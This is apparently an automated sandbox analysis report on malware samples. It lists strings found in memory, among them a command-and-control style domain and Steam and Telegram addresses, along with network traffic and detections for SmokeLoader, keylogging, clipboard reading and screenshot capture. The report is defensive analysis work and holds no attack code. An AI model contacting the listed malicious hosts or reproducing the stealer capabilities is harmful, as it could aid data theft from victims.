Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://help.steampowered.com/en/
Source: BGHJJD.13.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.2042302155.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/market/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899Y
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/about/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/news/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: 21AE.exe, 00000005.00000003.2357257185.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.000000000089C000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506059857.000000000089B000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2397590103.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/Jf
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/X
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.000000000087D000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/apie
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/ri
Source: 21AE.exe, 00000005.00000003.2383608001.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383291986.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2398025709.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383365847.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop:443/api
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986105264.000000001E449000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_0042EAB0
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 5_2_0042EC90
Yara detected Keylogger Generic
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
